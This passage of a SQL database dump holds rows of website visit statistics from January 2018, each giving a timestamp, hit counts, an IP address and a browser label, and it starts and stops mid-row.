,1,1,0,0,'54.36.148.12','other'),(198328,1516007005,1,1,0,0,'37.52.18.21','chrome'),(198329,1516007011,1,1,0,0,'77.111.244.31','chrome'),(198330,1516007030,1,1,0,0,'54.36.149.91','other'),(198331,1516007122,1,1,0,0,'54.36.148.65','other'),(198332,1516007714,1,1,0,0,'91.196.178.66','chrome'),(198333,1516007815,1,1,0,0,'91.196.178.165','chrome'),(198334,1516007853,1,1,0,0,'54.36.148.167','other'),(198335,1516007899,1,1,0,0,'91.196.178.67','firefox'),(198336,1516008408,1,1,0,0,'176.122.120.58','chrome'),(198337,1516008915,1,1,0,0,'54.36.148.160','other'),(198338,1516009524,1,1,0,0,'54.36.148.77','other'),(198339,1516010011,1,1,0,0,'94.178.67.234','chrome'),(198340,1516010356,1,1,0,0,'87.244.160.190','chrome'),(198341,1516011028,1,1,0,0,'91.196.178.59','chrome'),(198342,1516011083,1,1,0,0,'91.196.178.66','firefox'),(198343,1516011907,1,1,0,0,'8.29.198.26','other'),(198344,1516011993,1,1,0,0,'51.255.71.129','other'),(198345,1516012171,1,1,0,0,'54.36.148.86','other'),(198346,1516012294,1,1,0,0,'91.196.178.163','chrome'),(198347,1516012382,1,1,0,0,'157.55.39.66','other'),(198348,1516012462,1,1,0,0,'54.36.148.152','other'),(198349,1516012815,1,1,0,0,'54.36.148.199','other'),(198350,1516013052,1,1,0,0,'54.36.149.98','other'),(198351,1516013754,1,1,0,0,'54.36.149.29','other'),(198352,1516013779,1,1,0,0,'54.36.148.136','other'),(198353,1516014067,1,1,0,0,'54.36.149.57','other'),(198354,1516014123,2,2,0,0,'192.95.31.91','chrome'),(198355,1516014294,1,0,1,0,'66.249.70.27',''),(198356,1516014361,1,1,0,0,'216.244.66.246','other'),(198357,1516014530,1,1,0,0,'66.249.64.29','chrome'),(198358,1516014781,1,1,0,0,'91.196.178.67','firefox'),(198359,1516014907,1,1,0,0,'54.36.148.183','other'),(198360,1516015205,1,1,0,0,'91.196.178.47','chrome'),(198361,1516015229,1,1,0,0,'13.56.229.65','chrome'),(198362,1516015524,1,1,0,0,'54.36.148.40','other'),(198363,1516015953,1,1,0,0,'130.180.208.73','chrome'),(198364,1516016560,1,1,0,0,'54.36.148.244','other'),(198365,1516016574,1,1,0,0,'54.36.148.154','other'),(198366,1516016656,1,1,0,0,'157.55.39.66','other'),(198367,1516016706,1,1,0,0,'54.36.148.106','other'),(198368,1516016837,1,1,0,0,'216.244.66.237','other'),(198369,1516016938,1,1,0,0,'54.36.148.177','other'),(198370,1516017259,1,1,0,0,'54.36.148.153','other'),(198371,1516018044,1,1,0,0,'51.255.71.123','other'),(198372,1516018479,1,1,0,0,'217.69.136.203','other'),(198373,1516018483,1,1,0,0,'216.244.66.246','other'),(198374,1516018520,1,1,0,0,'37.55.227.206','chrome'),(198375,1516019147,1,1,0,0,'91.196.178.135','firefox'),(198376,1516019378,1,1,0,0,'54.36.148.88','other'),(198377,1516019557,1,1,0,0,'40.77.167.142','other'),(198378,1516019788,1,1,0,0,'54.36.149.77','other'),(198379,1516019805,1,1,0,0,'54.36.148.116','other'),(198380,1516019845,1,1,0,0,'199.59.150.181','other'),(198381,1516019974,1,1,0,0,'54.36.148.143','other'),(198382,1516020187,1,1,0,0,'46.174.163.134','chrome'),(198383,1516020585,1,1,0,0,'95.132.43.118','firefox'),(198384,1516020678,1,1,0,0,'37.140.189.196','chrome'),(198385,1516020680,1,1,0,0,'54.36.148.238','other'),(198386,1516020690,1,1,0,0,'54.36.149.74','other'),(198387,1516020711,1,1,0,0,'92.113.39.142','chrome'),(198388,1516020816,1,1,0,0,'54.36.148.11','other'),(198389,1516020926,1,1,0,0,'185.38.208.14','firefox'),(198390,1516021003,1,1,0,0,'54.36.148.86','other'),(198391,1516021479,1,1,0,0,'217.69.133.72','other'),(198392,1516021728,1,1,0,0,'141.8.142.74','other'),(198393,1516021884,1,1,0,0,'216.244.66.246','other'),(198394,1516022011,1,0,1,0,'66.249.64.30',''),(198395,1516022290,1,1,0,0,'157.55.39.99','other'),(198396,1516022595,1,1,0,0,'54.36.148.78','other'),(198397,1516022650,1,1,0,0,'176.120.38.254','chrome'),(198398,1516022746,1,1,0,0,'8.29.198.27','other'),(198399,1516022772,1,1,0,0,'91.196.179.33','chrome'),(198400,1516022792,1,1,0,0,'37.73.201.32','chrome'),(198401,1516022889,2,2,0,0,'216.244.66.194','other'),(198402,1516022961,1,1,0,0,'54.36.148.121','other'),(198403,1516023264,1,1,0,0,'54.36.148.177','other'),(198404,1516023605,1,1,0,0,'91.196.178.131','chrome'),(198405,1516023642,1,1,0,0,'91.196.178.99','chrome'),(198406,1516024020,1,0,1,0,'66.249.70.29',''),(198407,1516024546,1,1,0,0,'91.196.178.71','chrome'),(198408,1516024730,1,1,0,0,'66.102.9.35','chrome'),(198409,1516024785,1,1,0,0,'125.209.235.171','other'),(198410,1516024987,1,1,0,0,'54.36.148.188','other'),(198411,1516025009,2,2,0,0,'91.196.178.43','chrome'),(198412,1516025130,1,1,0,0,'54.36.148.117','other'),(198413,1516025202,1,1,0,0,'54.36.149.45','other'),(198414,1516025574,1,1,0,0,'54.36.149.26','other'),(198415,1516025575,1,1,0,0,'54.36.149.56','other'),(198416,1516025579,1,1,0,0,'185.3.151.94','chrome'),(198417,1516025693,1,1,0,0,'54.36.148.158','other'),(198418,1516025735,1,1,0,0,'216.244.66.194','other'),(198419,1516026226,1,1,0,0,'207.46.13.81','other'),(198420,1516026357,1,1,0,0,'54.36.148.58','other'),(198421,1516026851,2,2,0,0,'141.8.142.74','other'),(198422,1516027073,1,1,0,0,'91.217.66.22','chrome'),(198423,1516027579,1,1,0,0,'91.196.178.99','chrome'),(198424,1516028232,1,1,0,0,'217.69.133.67','other'),(198425,1516028743,1,0,1,0,'66.249.70.29',''),(198426,1516028893,1,1,0,0,'199.58.86.209','other'),(198427,1516029344,1,1,0,0,'85.159.233.118','chrome'),(198428,1516029495,1,1,0,0,'217.69.133.216','other'),(198429,1516029910,1,0,1,0,'66.249.64.30',''),(198430,1516030110,1,1,0,0,'185.30.202.117','chrome'),(198431,1516030510,1,1,0,0,'217.69.133.193','other'),(198432,1516030835,1,1,0,0,'216.244.66.246','other'),(198433,1516031036,1,1,0,0,'54.36.149.103','other'),(198434,1516031106,1,1,0,0,'54.36.149.8','other'),(198435,1516032228,1,1,0,0,'54.36.148.192','other'),(198436,1516032743,1,1,0,0,'54.36.148.131','other'),(198437,1516032964,1,1,0,0,'54.36.149.81','other'),(198438,1516033097,1,1,0,0,'54.36.148.82','other'),(198439,1516033121,1,1,0,0,'216.244.66.194','other'),(198440,1516033197,1,1,0,0,'54.36.149.76','other'),(198441,1516033288,1,1,0,0,'54.36.149.77','other'),(198442,1516033587,1,1,0,0,'8.29.198.25','other'),(198443,1516034081,1,1,0,0,'66.102.9.35','chrome'),(198444,1516035006,1,1,0,0,'54.36.149.56','other'),(198445,1516035366,1,1,0,0,'54.36.148.248','other'),(198446,1516035885,1,1,0,0,'54.36.149.44','other'),(198447,1516035901,1,1,0,0,'54.36.148.135','other'),(198448,1516036209,1,1,0,0,'54.36.149.51','other'),(198449,1516036279,1,1,0,0,'207.46.13.51','other'),(198450,1516036725,1,1,0,0,'54.36.148.203','other'),(198451,1516036876,1,0,1,0,'66.249.64.30',''),(198452,1516037819,1,1,0,0,'188.255.91.32','msie'),(198453,1516037821,1,1,0,0,'188.32.21.173','msie'),(198454,1516038196,1,1,0,0,'54.36.149.20','other'),(198455,1516038637,1,1,0,0,'91.196.178.4','chrome'),(198456,1516039219,1,1,0,0,'93.74.233.99','firefox'),(198457,1516039310,1,1,0,0,'54.36.148.27','other'),(198458,1516039340,1,1,0,0,'54.36.148.101','other'),(198459,1516039757,1,1,0,0,'54.36.148.73','other'),(198460,1516039774,1,1,0,0,'217.69.133.215','other'),(198461,1516040322,1,1,0,0,'216.244.66.246','other'),(198462,1516040491,1,1,0,0,'217.69.133.250','other'),(198463,1516040493,1,1,0,0,'217.69.133.249','other'),(198464,1516040748,2,2,0,0,'157.55.39.124','other'),(198465,1516040766,1,1,0,0,'37.73.248.234','chrome'),(198466,1516040811,1,1,0,0,'54.36.148.165','other'),(198467,1516040850,1,1,0,0,'216.244.66.237','other'),(198468,1516040869,1,1,0,0,'217.69.133.192','other'),(198469,1516040957,1,1,0,0,'54.36.148.34','other'),(198470,1516040999,1,1,0,0,'217.69.133.29','other'),(198471,1516041026,1,1,0,0,'91.196.178.79','chrome'),(198472,1516041398,1,1,0,0,'91.196.178.70','firefox'),(198473,1516041493,1,1,0,0,'91.202.144.10','chrome'),(198474,1516041636,2,2,0,0,'40.77.167.48','other'),(198475,1516041888,3,3,0,0,'216.244.66.194','other'),(198476,1516042774,1,1,0,0,'91.196.178.162','chrome'),(198477,1516043220,1,1,0,0,'54.36.148.207','other'),(198478,1516043496,1,1,0,0,'54.36.149.10','other'),(198479,1516044421,1,1,0,0,'8.29.198.25','other'),(198480,1516044422,1,1,0,0,'216.244.66.237','other'),(198481,1516044967,2,2,0,0,'216.244.66.246','other'),(198482,1516045392,1,1,0,0,'54.36.148.100','other'),(198483,1516046078,1,0,1,0,'66.249.64.30',''),(198484,1516046379,1,1,0,0,'54.36.148.14','other'),(198485,1516046393,2,2,0,0,'54.36.148.40','other'),(198486,1516046414,1,1,0,0,'54.36.148.97','other'),(198487,1516046430,2,2,0,0,'216.244.66.194','other'),(198488,1516046603,1,1,0,0,'54.36.149.81','other'),(198489,1516046870,1,1,0,0,'54.36.148.119','other'),(198490,1516046940,1,1,0,0,'54.36.148.164','other'),(198491,1516047373,1,1,0,0,'54.36.148.253','other'),(198492,1516047406,1,1,0,0,'91.196.178.79','chrome'),(198493,1516047516,1,1,0,0,'51.255.71.120','other'),(198494,1516047911,1,1,0,0,'91.196.178.163','chrome'),(198495,1516047912,1,1,0,0,'54.36.148.124','other'),(198496,1516047996,1,1,0,0,'54.36.148.239','other'),(198497,1516048052,1,1,0,0,'216.244.66.237','other'),(198498,1516048298,1,1,0,0,'207.46.13.51','other'),(198499,1516048566,1,1,0,0,'54.36.148.77','other'),(198500,1516048891,1,1,0,0,'54.36.148.95','other'),(198501,1516049084,1,1,0,0,'217.69.133.236','other'),(198502,1516049300,2,0,2,0,'66.249.64.29',''),(198503,1516049584,1,1,0,0,'54.36.148.80','other'),(198504,1516049792,1,1,0,0,'217.69.136.204','other'),(198505,1516050794,1,1,0,0,'54.36.148.125','other'),(198506,1516050974,1,1,0,0,'54.36.149.16','other'),(198507,1516051273,1,0,1,0,'66.249.64.28',''),(198508,1516051299,1,1,0,0,'54.165.59.7','other'),(198509,1516051384,1,1,0,0,'54.36.149.74','other'),(198510,1516051932,3,3,0,0,'216.244.66.194','other'),(198511,1516052457,1,1,0,0,'54.36.148.156','other'),(198512,1516053052,1,1,0,0,'54.36.149.25','other'),(198513,1516053371,1,1,0,0,'37.52.134.16','chrome'),(198514,1516053558,1,1,0,0,'54.36.149.55','other'),(198515,1516053689,1,1,0,0,'54.36.149.32','other'),(198516,1516053826,1,1,0,0,'54.36.149.6','other'),(198517,1516054067,1,1,0,0,'54.36.149.64','other'),(198518,1516054072,1,1,0,0,'54.36.149.11','other'),(198519,1516054835,1,1,0,0,'46.48.13.161','chrome'),(198520,1516054908,1,0,1,0,'66.249.64.30',''),(198521,1516054950,1,1,0,0,'54.36.149.48','other'),(198522,1516054966,1,0,1,0,'66.249.70.29',''),(198523,1516054986,1,0,1,0,'66.249.64.28',''),(198524,1516055264,1,1,0,0,'8.29.198.25','other'),(198525,1516055292,1,1,0,0,'217.69.133.244','other'),(198526,1516055472,3,3,0,0,'216.244.66.194','other'),(198527,1516055965,1,1,0,0,'54.36.148.22','other'),(198528,1516055997,1,1,0,0,'54.36.148.53','other'),(198529,1516056153,1,0,1,0,'66.249.64.29',''),(198530,1516056279,1,1,0,0,'54.36.148.250','other'),(198531,1516056333,1,1,0,0,'54.36.148.249','other'),(198532,1516056440,1,1,0,0,'54.36.148.166','other'),(198533,1516056478,1,1,0,0,'54.36.149.105','other'),(198534,1516056676,1,1,0,0,'54.36.148.177','other'),(198535,1516057333,1,1,0,0,'207.46.13.172','other'),(198536,1516057505,1,1,0,0,'54.36.149.39','other'),(198537,1516057697,1,1,0,0,'54.36.148.150','other'),(198538,1516058044,1,1,0,0,'54.36.148.22','other'),(198539,1516058363,1,1,0,0,'54.36.148.203','other'),(198540,1516058467,1,1,0,0,'54.36.149.94','other'),(198541,1516059062,1,1,0,0,'5.228.129.60','msie'),(198542,1516059173,1,1,0,0,'54.36.148.65','other'),(198543,1516059239,1,1,0,0,'54.36.149.91','other'),(198544,1516059277,1,1,0,0,'54.36.148.88','other'),(198545,1516059394,4,4,0,0,'216.244.66.246','other'),(198546,1516059421,1,1,0,0,'54.36.148.15','other'),(198547,1516059646,1,1,0,0,'178.154.171.88','other'),(198548,1516059724,1,1,0,0,'54.36.149.74','other'),(198549,1516060214,1,1,0,0,'54.36.149.9','other'),(198550,1516060480,1,1,0,0,'51.255.71.122','other'),(198551,1516060488,1,1,0,0,'217.69.133.18','other'),(198552,1516060630,1,1,0,0,'54.36.148.246','other'),(198553,1516060997,1,1,0,0,'54.36.148.199','other'),(198554,1516061060,1,1,0,0,'54.36.148.78','other'),(198555,1516061114,1,1,0,0,'54.36.149.87','other'),(198556,1516061259,1,1,0,0,'54.36.148.180','other'),(198557,1516061383,1,1,0,0,'54.36.148.49','other'),(198558,1516061434,1,1,0,0,'54.36.148.55','other'),(198559,1516061620,1,1,0,0,'54.36.148.164','other'),(198560,1516062336,2,2,0,0,'216.244.66.194','other'),(198561,1516062894,1,1,0,0,'217.69.133.11','other'),(198562,1516063158,1,1,0,0,'54.36.148.66','other'),(198563,1516063609,2,2,0,0,'216.244.66.246','other'),(198564,1516063926,1,1,0,0,'66.249.64.28','chrome'),(198565,1516063940,1,1,0,0,'54.36.148.236','other'),(198566,1516064335,1,1,0,0,'54.36.149.91','other'),(198567,1516064357,1,1,0,0,'178.154.171.88','other'),(198568,1516064934,1,1,0,0,'54.36.148.173','other'),(198569,1516064935,1,1,0,0,'54.36.148.150','other'),(198570,1516065272,1,1,0,0,'54.36.149.53','other'),(198571,1516065273,1,1,0,0,'54.36.149.33','other'),(198572,1516065350,1,1,0,0,'54.36.149.17','other'),(198573,1516065419,1,1,0,0,'141.8.142.74','other'),(198574,1516065608,1,0,1,0,'66.249.64.30',''),(198575,1516065852,1,1,0,0,'217.69.133.220','other'),(198576,1516065923,1,1,0,0,'54.36.148.206','other'),(198577,1516066100,1,1,0,0,'8.29.198.27','other'),(198578,1516066361,2,2,0,0,'141.8.142.74','other'),(198579,1516066920,1,0,1,0,'66.249.64.28',''),(198580,1516066943,1,1,0,0,'54.36.148.47','other'),(198581,1516067030,1,1,0,0,'54.36.148.30','other'),(198582,1516067509,1,1,0,0,'54.36.148.31','other'),(198583,1516067714,1,1,0,0,'54.36.149.26','other'),(198584,1516067897,1,1,0,0,'66.249.64.153','chrome'),(198585,1516068533,1,1,0,0,'54.36.148.208','other'),(198586,1516068937,1,1,0,0,'216.244.66.246','other'),(198587,1516068938,1,1,0,0,'178.154.171.88','other'),(198588,1516070074,1,1,0,0,'54.36.148.133','other'),(198589,1516070635,1,1,0,0,'54.36.149.104','other'),(198590,1516070817,1,1,0,0,'54.36.148.42','other'),(198591,1516070982,1,1,0,0,'54.36.149.10','other'),(198592,1516071850,1,1,0,0,'40.77.167.64','other'),(198593,1516072577,1,1,0,0,'157.55.39.252','other'),(198594,1516072589,1,1,0,0,'54.36.148.71','other'),(198595,1516072631,1,1,0,0,'178.154.171.88','other'),(198596,1516072776,1,1,0,0,'141.8.142.74','other'),(198597,1516073542,1,1,0,0,'54.36.148.42','other'),(198598,1516073543,1,1,0,0,'178.154.171.88','other'),(198599,1516074068,1,1,0,0,'141.8.142.74','other'),(198600,1516074169,1,1,0,0,'54.36.149.1','other'),(198601,1516075297,1,1,0,0,'54.36.148.61','other'),(198602,1516075463,1,1,0,0,'54.36.149.63','other'),(198603,1516075565,1,1,0,0,'54.36.148.91','other'),(198604,1516075657,1,1,0,0,'54.36.148.115','other'),(198605,1516075695,1,1,0,0,'40.77.167.46','other'),(198606,1516075729,1,1,0,0,'54.36.148.143','other'),(198607,1516075801,1,0,1,0,'66.249.64.30',''),(198608,1516075993,1,1,0,0,'109.63.166.150','msie'),(198609,1516076119,1,1,0,0,'54.36.148.60','other'),(198610,1516076131,1,1,0,0,'54.36.148.16','other'),(198611,1516076344,1,1,0,0,'54.36.148.75','other'),(198612,1516076381,1,1,0,0,'207.46.13.51','other'),(198613,1516076939,1,1,0,0,'8.29.198.27','other'),(198614,1516077402,1,1,0,0,'54.36.148.85','other'),(198615,1516077515,1,1,0,0,'54.36.148.161','other'),(198616,1516077737,1,1,0,0,'40.77.167.46','other'),(198617,1516078559,1,1,0,0,'46.48.13.161','chrome'),(198618,1516078576,1,1,0,0,'54.36.148.101','other'),(198619,1516079032,1,1,0,0,'54.36.148.249','other'),(198620,1516079326,1,1,0,0,'54.36.148.208','other'),(198621,1516079497,1,1,0,0,'216.244.66.246','other'),(198622,1516081058,1,1,0,0,'217.69.133.23','other'),(198623,1516081272,1,1,0,0,'54.36.149.68','other'),(198624,1516081527,1,1,0,0,'217.69.133.29','other'),(198625,1516081917,1,1,0,0,'54.36.148.123','other'),(198626,1516082068,1,1,0,0,'54.36.149.64','other'),(198627,1516082239,1,1,0,0,'54.36.148.98','other'),(198628,1516082341,1,1,0,0,'141.8.142.74','other'),(198629,1516082593,1,1,0,0,'178.154.171.88','other'),(198630,1516083521,2,2,0,0,'216.244.66.246','other'),(198631,1516083689,1,1,0,0,'178.154.171.88','other'),(198632,1516083852,1,1,0,0,'176.193.131.111','firefox'),(198633,1516083862,1,1,0,0,'54.36.148.26','other'),(198634,1516083901,1,1,0,0,'217.69.133.250','other'),(198635,1516084062,1,0,1,0,'66.249.64.30',''),(198636,1516084475,1,1,0,0,'54.36.148.201','other'),(198637,1516084807,1,1,0,0,'54.36.149.26','other'),(198638,1516085059,1,1,0,0,'51.255.71.115','other'),(198639,1516085261,1,1,0,0,'54.36.149.38','other'),(198640,1516085434,1,1,0,0,'217.69.133.10','other'),(198641,1516085568,2,2,0,0,'216.244.66.194','other'),(198642,1516085755,1,1,0,0,'54.36.149.39','other'),(198643,1516086056,1,1,0,0,'91.196.178.104','chrome'),(198644,1516086157,1,1,0,0,'54.36.149.31','other'),(198645,1516086218,1,1,0,0,'91.196.178.84','chrome'),(198646,1516086529,1,1,0,0,'54.36.148.141','other'),(198647,1516086668,1,1,0,0,'54.36.148.43','other'),(198648,1516086737,1,1,0,0,'54.36.148.119','other'),(198649,1516086932,24,24,0,0,'178.151.245.174','other'),(198650,1516086947,1,1,0,0,'54.36.148.160','other'),(198651,1516087056,1,0,1,0,'66.249.64.28',''),(198652,1516087081,1,0,1,0,'66.249.64.157',''),(198653,1516087751,1,1,0,0,'40.77.167.46','other'),(198654,1516087764,1,1,0,0,'8.29.198.25','other'),(198655,1516087822,1,1,0,0,'54.36.148.183','other'),(198656,1516088046,1,1,0,0,'54.36.148.168','other'),(198657,1516088227,1,1,0,0,'54.36.148.136','other'),(198658,1516088234,1,1,0,0,'54.36.148.123','other'),(198659,1516088776,1,1,0,0,'54.36.149.47','other'),(198660,1516088862,1,1,0,0,'54.36.149.72','other'),(198661,1516089110,1,1,0,0,'54.36.148.147','other'),(198662,1516089122,1,0,1,0,'66.249.64.28',''),(198663,1516089457,1,1,0,0,'216.244.66.246','other'),(198664,1516090604,1,1,0,0,'54.36.149.34','other'),(198665,1516090878,1,1,0,0,'91.196.177.15','chrome'),(198666,1516091076,1,1,0,0,'54.36.148.98','other'),(198667,1516091354,1,1,0,0,'91.196.178.73','chrome'),(198668,1516091632,1,1,0,0,'217.69.133.241','other'),(198669,1516091646,1,1,0,0,'5.53.114.152','chrome'),(198670,1516091851,1,1,0,0,'54.36.148.64','other'),(198671,1516091896,1,1,0,0,'216.244.66.194','other'),(198672,1516092291,2,2,0,0,'178.154.171.88','other'),(198673,1516092513,1,1,0,0,'91.196.178.130','chrome'),(198674,1516092523,1,1,0,0,'37.73.225.24','chrome'),(198675,1516092658,1,1,0,0,'54.36.148.158','other'),(198676,1516093466,2,2,0,0,'216.244.66.246','other'),(198677,1516093555,1,1,0,0,'54.36.149.25','other'),(198678,1516093771,1,1,0,0,'54.36.149.69','other'),(198679,1516093785,1,1,0,0,'217.69.133.249','other'),(198680,1516094316,1,1,0,0,'93.78.215.251','firefox'),(198681,1516094757,1,1,0,0,'54.36.148.10','other'),(198682,1516094789,1,1,0,0,'91.196.178.84','chrome'),(198683,1516095021,1,1,0,0,'217.69.133.69','other'),(198684,1516095251,1,1,0,0,'5.53.114.152','chrome'),(198685,1516095258,1,1,0,0,'217.69.133.23','other'),(198686,1516095507,2,2,0,0,'216.244.66.194','other'),(198687,1516095561,2,2,0,0,'178.92.171.35','firefox'),(198688,1516095704,1,1,0,0,'54.36.149.8','other'),(198689,1516096032,1,1,0,0,'91.196.178.84','chrome'),(198690,1516096087,4,4,0,0,'46.4.32.75','other'),(198691,1516096110,1,1,0,0,'54.36.148.29','other'),(198692,1516096224,1,1,0,0,'107.167.109.83','other'),(198693,1516096367,1,1,0,0,'77.52.180.166','chrome'),(198695,1516096610,1,1,0,0,'54.36.148.118','other'),(198696,1516096938,1,1,0,0,'54.36.148.38','other'),(198697,1516096955,1,1,0,0,'91.196.178.84','chrome'),(198698,1516097000,1,1,0,0,'178.92.171.35','firefox'),(198699,1516097019,1,1,0,0,'54.36.148.181','other'),(198700,1516097045,1,1,0,0,'54.36.148.191','other'),(198701,1516097046,1,1,0,0,'5.53.114.152','chrome'),(198702,1516097131,2,0,2,0,'66.249.64.28',''),(198703,1516097228,1,1,0,0,'141.8.142.74','other'),(198704,1516097410,2,0,2,0,'66.249.64.29',''),(198705,1516097519,1,1,0,0,'91.196.178.169','chrome'),(198706,1516097532,1,1,0,0,'77.109.30.112','chrome'),(198707,1516097585,1,1,0,0,'54.36.149.16','other'),(198708,1516097698,1,1,0,0,'54.36.148.156','other'),(198709,1516098118,1,1,0,0,'54.36.148.36','other'),(198710,1516098346,1,1,0,0,'54.36.148.119','other'),(198711,1516098362,1,1,0,0,'91.196.178.84','chrome'),(198712,1516098538,1,1,0,0,'31.13.124.201','other'),(198713,1516098544,1,1,0,0,'31.13.124.48','other'),(198714,1516098545,1,1,0,0,'31.13.124.81','other'),(198715,1516098546,1,1,0,0,'31.13.124.215','other'),(198717,1516098550,1,1,0,0,'173.252.123.186','other'),(198718,1516098593,1,1,0,0,'8.29.198.26','other'),(198719,1516098660,1,1,0,0,'178.92.171.35','firefox'),(198720,1516098851,1,1,0,0,'178.92.32.47','chrome'),(198721,1516099292,1,1,0,0,'54.36.148.185','other'),(198722,1516099463,1,1,0,0,'91.196.177.46','chrome'),(198723,1516099478,1,1,0,0,'207.46.13.51','other'),(198724,1516099489,2,2,0,0,'216.244.66.246','other'),(198725,1516099697,1,1,0,0,'91.196.179.33','chrome'),(198726,1516099698,1,1,0,0,'31.13.113.94','other'),(198727,1516099910,1,1,0,0,'37.113.12.166','firefox'),(198728,1516099912,1,1,0,0,'212.109.61.219','chrome'),(198729,1516100182,1,1,0,0,'54.36.149.78','other'),(198730,1516100413,1,1,0,0,'91.196.178.94','firefox'),(198731,1516100515,1,1,0,0,'54.36.148.62','other'),(198732,1516100846,1,1,0,0,'54.36.148.182','other'),(198733,1516100887,1,1,0,0,'199.58.86.211','other'),(198734,1516100973,1,0,1,0,'66.249.64.155',''),(198735,1516101150,1,1,0,0,'178.154.171.88','other'),(198736,1516101200,1,1,0,0,'54.36.148.118','other'),(198737,1516101387,1,1,0,0,'54.36.148.245','other'),(198738,1516101394,1,1,0,0,'54.36.148.87','other'),(198739,1516101605,1,1,0,0,'54.36.149.62','other'),(198740,1516101959,1,1,0,0,'54.36.148.40','other'),(198741,1516102184,1,1,0,0,'91.196.178.165','chrome'),(198742,1516102361,1,1,0,0,'37.113.12.166','chrome'),(198743,1516102670,1,1,0,0,'193.19.152.14','chrome'),(198744,1516102677,1,1,0,0,'91.196.178.82','chrome'),(198745,1516102756,1,1,0,0,'91.196.178.46','chrome'),(198746,1516102758,1,1,0,0,'31.13.113.18','other'),(198747,1516102780,1,1,0,0,'54.36.149.68','other'),(198748,1516102847,1,1,0,0,'54.36.148.74','other'),(198749,1516103151,1,1,0,0,'54.36.149.96','other'),(198750,1516103197,1,1,0,0,'54.36.148.190','other'),(198751,1516103392,1,1,0,0,'91.196.177.193','chrome'),(198752,1516103446,1,1,0,0,'5.53.114.152','chrome'),(198753,1516103470,1,0,1,0,'66.249.64.157',''),(198754,1516103485,1,1,0,0,'54.36.148.93','other'),(198755,1516103659,1,0,1,0,'66.249.64.155',''),(198756,1516103690,1,1,0,0,'91.196.177.46','chrome'),(198757,1516103973,1,1,0,0,'54.36.148.57','other'),(198758,1516104002,1,1,0,0,'216.244.66.246','other'),(198759,1516104595,1,1,0,0,'216.244.66.194','other'),(198760,1516105452,1,1,0,0,'66.249.64.30','chrome'),(198761,1516105553,1,1,0,0,'91.196.178.83','chrome'),(198762,1516105597,1,1,0,0,'178.154.171.88','other'),(198763,1516105847,1,1,0,0,'91.196.178.27','chrome'),(198764,1516106019,1,1,0,0,'54.36.148.92','other'),(198765,1516106127,1,1,0,0,'91.196.178.163','chrome'),(198766,1516106839,1,1,0,0,'37.73.230.83','chrome'),(198767,1516106895,1,1,0,0,'141.8.142.74','other'),(198768,1516106960,1,1,0,0,'51.255.71.127','other'),(198769,1516107043,1,1,0,0,'54.36.148.40','other'),(198770,1516107061,1,1,0,0,'54.36.148.92','other'),(198771,1516107142,1,1,0,0,'54.36.148.12','other'),(198772,1516107565,1,1,0,0,'178.92.170.64','chrome'),(198773,1516107566,1,1,0,0,'178.92.171.35','firefox'),(198774,1516107872,2,2,0,0,'217.69.133.6','other'),(198775,1516107889,1,1,0,0,'217.69.133.9','other'),(198776,1516107928,1,1,0,0,'217.69.133.2','other'),(198777,1516107931,1,1,0,0,'217.69.134.182','other'),(198778,1516107944,1,1,0,0,'217.69.134.154','other'),(198779,1516107953,1,1,0,0,'217.69.134.161','other'),(198780,1516108409,1,1,0,0,'91.196.178.167','chrome'),(198781,1516108717,1,1,0,0,'91.196.177.15','chrome'),(198782,1516108727,1,1,0,0,'54.36.148.236','other'),(198783,1516109279,1,1,0,0,'178.92.171.35','firefox'),(198784,1516109304,1,1,0,0,'51.255.71.121','other'),(198785,1516109402,1,1,0,0,'54.36.148.137','other'),(198786,1516109446,1,1,0,0,'8.29.198.26','other'),(198787,1516109537,1,1,0,0,'95.134.202.192','firefox'),(198788,1516110258,1,1,0,0,'178.215.245.12','firefox'),(198789,1516110557,1,1,0,0,'91.196.177.46','chrome'),(198790,1516111201,3,3,0,0,'216.244.66.194','other'),(198791,1516111667,1,1,0,0,'207.46.13.51','other'),(198792,1516113108,1,1,0,0,'188.165.4.128','firefox'),(198793,1516113193,1,1,0,0,'130.180.211.88','firefox'),(198794,1516113657,1,1,0,0,'54.36.148.61','other'),(198795,1516113702,1,1,0,0,'54.36.148.50','other'),(198796,1516113725,1,1,0,0,'217.69.136.204','other'),(198797,1516113780,1,1,0,0,'77.111.244.11','chrome'),(198798,1516113811,1,1,0,0,'141.8.142.74','other'),(198799,1516114201,1,1,0,0,'91.196.178.165','chrome'),(198800,1516114307,2,2,0,0,'216.244.66.246','other'),(198801,1516114322,1,1,0,0,'37.9.113.110','other'),(198802,1516114359,1,1,0,0,'54.36.149.63','other'),(198803,1516114666,1,1,0,0,'54.36.148.134','other'),(198804,1516114968,1,1,0,0,'54.36.149.9','other'),(198805,1516114988,1,1,0,0,'94.178.117.126','firefox'),(198806,1516115090,3,3,0,0,'216.244.66.194','other'),(198807,1516115162,1,1,0,0,'91.196.178.84','chrome'),(198808,1516115511,1,1,0,0,'178.92.171.35','firefox'),(198809,1516115783,1,1,0,0,'77.111.244.11','chrome'),(198810,1516115921,1,1,0,0,'31.43.142.6','chrome'),(198811,1516116275,1,1,0,0,'188.165.4.128','firefox'),(198812,1516116640,1,1,0,0,'91.196.179.85','other'),(198813,1516116708,1,1,0,0,'54.36.149.106','other'),(198814,1516117063,2,2,0,0,'216.244.66.246','other'),(198815,1516117268,1,1,0,0,'82.145.222.70','chrome'),(198816,1516117345,1,1,0,0,'54.36.148.64','other'),(198817,1516117521,1,1,0,0,'217.69.133.236','other'),(198818,1516117561,1,1,0,0,'54.36.149.73','other'),(198819,1516118345,1,1,0,0,'51.255.71.133','other'),(198820,1516118436,1,1,0,0,'40.77.167.46','other'),(198821,1516118494,1,1,0,0,'157.55.39.252','other'),(198822,1516118836,2,2,0,0,'207.46.13.51','other'),(198823,1516118960,1,1,0,0,'5.53.116.54','chrome'),(198824,1516119146,1,1,0,0,'188.230.43.254','other'),(198825,1516119231,1,1,0,0,'141.8.142.74','other'),(198826,1516119251,1,1,0,0,'54.36.148.131','other'),(198827,1516119447,1,1,0,0,'40.77.167.46','other'),(198828,1516120288,1,1,0,0,'8.29.198.25','other'),(198829,1516120437,1,1,0,0,'54.36.148.100','other'),(198830,1516120724,1,0,1,0,'66.249.64.30',''),(198831,1516121173,1,1,0,0,'91.196.178.168','chrome'),(198832,1516121317,1,1,0,0,'91.250.61.113','chrome'),(198833,1516121324,1,1,0,0,'95.132.47.188','chrome'),(198834,1516121490,2,2,0,0,'141.8.142.74','other'),(198835,1516121523,1,1,0,0,'157.55.39.252','other'),(198836,1516121534,1,1,0,0,'188.230.43.254','other'),(198837,1516121767,1,1,0,0,'178.154.171.88','other'),(198838,1516122097,1,1,0,0,'91.196.178.6','chrome'),(198839,1516122154